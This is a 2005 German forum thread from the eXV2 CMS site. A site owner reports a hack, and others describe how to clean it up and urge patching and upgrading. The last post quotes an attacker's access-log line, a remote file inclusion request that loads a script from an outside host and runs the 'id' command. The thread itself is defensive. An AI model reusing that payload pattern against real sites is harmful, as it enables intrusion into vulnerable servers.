Content Management System - CMS : eXV2 
Home
News
Forum
Downloads
Download Module
Sitemap
Partnerseiten
RSS News
Kontakt/Info
Sprache
EnglishFrench
Suchen
Login
Nickname
Passwort

Registrieren?
Passwort?
Navigation
 Home News  Forum Neueste Beiträge  Downloads Download Module eXV² Themes  Weblinks Tutorial Changelog 2.3.1 Jobcenter Gebrauchtmarkt OSMap  Sponsor Kalendersystem Sitemap Partnerseiten RSS News Kontakt/Info Webseiten Wetter
Willkommen im Free Web CMS : eXV² Forum!
  Forenarchiv
     eXV2 Administration
  Seite gehackt!!!!!

Forum : eXV2 Administration

Titel : Seite gehackt!!!!!

© 2004-2012 www.exv2.de
http://www.exv2.de

URL dieser Diskussion
http://www.exv2.de/modules/newbb_plus/viewtopic.php?topic_id=3036&forum=4

 bughunter :

29.11.2005 16:32
 Hallo!

Meine Seite www.suurhuser.de (exv2 2.02) wurde heute gehackt.
Die netten Leute von "By C0D3RZ TEAM" waren das Very Happy
Gibt es bereits eine Erklärung/Lösung dafür??

Bei Google finden sich diverse exoops/exv2 - Seiten
die dieses Problem auch haben/hatten.

Gruss bughunter

 essebe :

29.11.2005 17:16
 Eentschuldigen Sie mich für mein schlechtes Deutschsprache Very Happy

Du musst editieren der ./modules/system/cache/config.php und die ersten Linien (No mundo há muitos perversos uzw...)zu löschen.
Danach, der newbb_plus + sqlinject fix installieren.
Ich weiß nicht, wo du sie findest, aber ein admin von ExV2 wird dich unterrichten.

Um zu enden, mußt du auch das Repertoire ('m') löschen, das du finden wirst in ./modules/newbb_plus/cache/m

Ich habe das shon gesehen mit ein website von ein Freund.

Es ist wirklich wichtig, ihre Website mit den aktuellen Sicherheitseinsätzen aktuell aufrechtzuerhalten.

 Picl :

29.11.2005 19:03
 Hi Bughunter, die "Erklärung" dafür ist dein veraltetes System. Dort gab es ein Sicherheitsproblem im Newbb-Plus. Dafür wurde schon vor längerem ein Sicherheitspatch bereitgestellt. Abgesehen davon empfehle ich jedem auf die aktuelle Version 2.0.4.1 zu aktualisieren!

Den Patch findest du HIER

Hab jetzt nicht geschaut was dort noch in der Readme steht, aber schau auf jeden Fall nach wie Essebe schon geschrieben hat, ob im Cache-Ordner ein Unterverzeichnis angelegt wurde (lass dir auch versteckte Dateien anzeigen!!!) und lösch das.
config.php eben auch wieder in den Ursprungszustand zurückversetzten und am besten alle Verzeichnisse mal durchstöbern, ob dir irgendwas komisch vorkommt. Bei irgend jemand hatte sich glaube ich auch etwas im images-Ordner im Root eingenistet.


Greetz,

Picl

 Weiti :

29.11.2005 19:14
 Hi Picl,

das war bei mir - jemand wollte meine Domain als Spammailer missbrauchen... Very Happy

lag im root\cache\system

darin wurde ein images Ordner angelegt und im Ordner darunter einige php-Dateien abgelegt...

 bughunter :

29.11.2005 19:40
 Hallo!

Alles wieder im grünen Bereich!!! Smile
Schönen Dank an alle für die hilfreichen Hinweise.

Besonders an essebe!!!! Thanks!! Smile
Damit hab ich das Problem gefunden und gelöst.

Und hier auch gleich die Adresse von dem Lümmel:
Zitat:
201.19.1.201 - - [28/Nov/2005:18:22:22 +0100] "GET /modules/modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.solarisnapegada.net/tool.gif?&cmd=id HTTP/1.1" 404 333 "-" "Java/1.5.0_02"


Jetzt werd ich doch wohl mal schnell auf die 2.04 updaten Very Happy
Picl hat natürlich Recht. Was fahr ich auch mit so einer alten Kiste durch das Netz. Smile
Partnerseiten
http://www.contaxe.com/?cref=1674143

Vote für eXV2
php
Kontakt/Info
  Kontakt
  Impressum
  Link zu uns
  AGB
  Datenschutzhinweis		Downloads
  eXV² Core
  Core Sprachfiles		eXV² Filecenter
  Downloads
  Download Module
  eXV² Themes
  Multilanguage Module
  Sprachfiles eXV² Module		eXV² Support
  France

Powered by eXV² Vers. 2.3.1 © 2004-2012 www.exv2.de